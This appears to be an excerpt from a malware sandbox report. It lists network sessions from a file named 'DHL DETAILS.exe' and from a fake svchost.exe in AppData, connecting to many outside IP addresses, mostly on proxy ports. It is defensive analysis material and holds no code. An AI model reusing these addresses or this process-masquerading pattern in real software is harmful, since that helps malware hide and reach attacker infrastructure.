5501	192.168.2.5	53040	162.214.163.137	7484	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5502	192.168.2.5	53033	172.67.219.60	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5503	192.168.2.5	63944	92.204.135.37	63462	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5504	192.168.2.5	53029	137.184.122.223	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5505	192.168.2.5	53041	107.180.88.41	37597	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5506	192.168.2.5	50630	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5507	192.168.2.5	52436	222.223.103.232	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5508	192.168.2.5	52573	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5509	192.168.2.5	52851	54.178.159.199	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5510	192.168.2.5	52770	51.145.176.250	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5511	192.168.2.5	63823	149.202.91.219	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5512	192.168.2.5	52755	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5513	192.168.2.5	52506	52.67.10.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5514	192.168.2.5	52689	94.154.152.12	8079	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5515	192.168.2.5	53092	94.131.59.241	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5516	192.168.2.5	53206	1.0.0.13	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5517	192.168.2.5	53209	104.25.42.178	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5518	192.168.2.5	52589	118.184.157.111	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5519	192.168.2.5	52827	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5520	192.168.2.5	52909	134.209.29.120	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5521	192.168.2.5	50855	120.78.191.225	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5522	192.168.2.5	52546	64.43.89.82	6341	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5523	192.168.2.5	52754	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5524	192.168.2.5	50989	80.80.162.81	10805	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5525	192.168.2.5	52804	191.101.78.207	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5526	192.168.2.5	63966	162.0.220.222	20523	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5527	192.168.2.5	53656	91.231.186.133	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5528	192.168.2.5	53330	172.67.181.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5529	192.168.2.5	52692	91.134.140.160	2572	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5530	192.168.2.5	51019	58.69.117.2	8082	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5531	192.168.2.5	53273	67.201.33.10	25283	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5532	192.168.2.5	53502	172.67.3.108	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5533	192.168.2.5	52980	60.188.102.225	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5534	192.168.2.5	52983	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5535	192.168.2.5	52936	125.94.219.96	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5536	192.168.2.5	53012	37.18.73.60	5566	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5537	192.168.2.5	52853	154.85.125.235	6446	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5538	192.168.2.5	53044	47.100.207.117	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5539	192.168.2.5	53030	185.100.233.101	41138	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5540	192.168.2.5	53035	217.23.11.194	32708	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5541	192.168.2.5	53071	89.168.121.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5542	192.168.2.5	53448	73.151.59.35	20816	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5543	192.168.2.5	53142	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5544	192.168.2.5	53329	3.97.176.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5545	192.168.2.5	52576	223.113.80.158	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5546	192.168.2.5	52780	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5547	192.168.2.5	50373	192.111.137.35	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5548	192.168.2.5	53381	94.131.64.157	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5549	192.168.2.5	53057	176.119.25.13	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5550	192.168.2.5	53151	3.9.71.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5551	192.168.2.5	53007	222.220.102.159	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5552	192.168.2.5	53027	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5553	192.168.2.5	53318	133.18.234.13	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5554	192.168.2.5	53632	104.20.225.218	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5555	192.168.2.5	53369	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5556	192.168.2.5	53146	39.99.144.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5557	192.168.2.5	53147	103.166.141.74	20074	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5558	192.168.2.5	52854	94.131.60.206	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5559	192.168.2.5	53149	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5560	192.168.2.5	53322	18.133.16.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5561	192.168.2.5	53731	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5562	192.168.2.5	53751	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5563	192.168.2.5	53752	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5564	192.168.2.5	53753	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5565	192.168.2.5	53274	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5566	192.168.2.5	53343	119.28.60.64	8090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5567	192.168.2.5	53263	220.248.70.237	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5568	192.168.2.5	53650	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5569	192.168.2.5	53321	51.89.173.40	60775	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5570	192.168.2.5	53283	51.75.206.209	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5571	192.168.2.5	52930	122.114.232.137	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5572	192.168.2.5	49320	45.76.150.19	50685	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5573	192.168.2.5	53272	62.33.53.248	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5574	192.168.2.5	53485	82.113.157.122	31280	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5575	192.168.2.5	51468	184.178.172.17	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5576	192.168.2.5	53416	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5577	192.168.2.5	53193	139.99.148.90	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5578	192.168.2.5	53298	8.219.97.248	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5579	192.168.2.5	53505	195.90.216.75	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5580	192.168.2.5	53372	47.106.76.196	8088	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5581	192.168.2.5	53092	94.131.59.241	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5582	192.168.2.5	53491	193.239.56.84	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5583	192.168.2.5	50741	117.160.250.163	9990	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5584	192.168.2.5	53532	154.12.178.107	29985	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5585	192.168.2.5	53658	38.162.15.98	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5586	192.168.2.5	53454	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5587	192.168.2.5	51259	16.162.211.90	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5588	192.168.2.5	53523	219.243.212.118	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5589	192.168.2.5	53509	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5590	192.168.2.5	53660	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5591	192.168.2.5	51276	34.95.243.122	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5592	192.168.2.5	53558	194.163.137.106	9050	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5593	192.168.2.5	53506	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5594	192.168.2.5	53159	157.230.254.88	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5595	192.168.2.5	51498	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5596	192.168.2.5	53614	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5597	192.168.2.5	53569	128.199.252.36	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5598	192.168.2.5	53690	185.162.229.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5599	192.168.2.5	53706	172.67.105.234	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5600	192.168.2.5	53381	94.131.64.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5601	192.168.2.5	53639	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5602	192.168.2.5	53543	35.154.71.72	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5603	192.168.2.5	52494	117.160.250.138	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5604	192.168.2.5	51296	167.99.174.59	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5605	192.168.2.5	53800	162.159.246.135	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5606	192.168.2.5	51502	68.169.60.220	8380	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5607	192.168.2.5	53874	172.64.80.55	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5608	192.168.2.5	51257	103.146.137.5	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5609	192.168.2.5	53737	209.126.104.38	40053	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5610	192.168.2.5	53920	104.20.67.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5611	192.168.2.5	52633	111.59.4.88	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5612	192.168.2.5	51494	38.162.0.221	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5613	192.168.2.5	53964	104.19.79.238	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5614	192.168.2.5	52831	36.134.91.82	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5615	192.168.2.5	53704	18.135.133.116	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5616	192.168.2.5	53998	104.21.223.181	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5617	192.168.2.5	53661	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5618	192.168.2.5	51336	128.199.221.91	50223	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5619	192.168.2.5	53968	67.201.33.10	25283	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5620	192.168.2.5	53648	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5621	192.168.2.5	54077	162.159.241.5	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5622	192.168.2.5	53649	123.241.210.123	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5623	192.168.2.5	62243	51.222.241.157	5717	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5624	192.168.2.5	53669	43.133.136.208	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5625	192.168.2.5	49428	129.151.72.85	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5626	192.168.2.5	64173	34.23.45.223	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5627	192.168.2.5	54187	104.16.106.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5628	192.168.2.5	53854	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5629	192.168.2.5	51505	139.129.202.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5630	192.168.2.5	54320	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5631	192.168.2.5	54018	38.162.3.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5632	192.168.2.5	54299	147.182.195.54	56022	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5633	192.168.2.5	53892	218.255.187.60	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5634	192.168.2.5	53897	46.229.253.67	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5635	192.168.2.5	54195	38.162.23.127	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5636	192.168.2.5	53760	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5637	192.168.2.5	53957	119.196.168.183	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5638	192.168.2.5	54668	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5639	192.168.2.5	54459	104.23.125.117	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5640	192.168.2.5	54209	94.131.60.199	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5641	192.168.2.5	53959	130.162.213.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

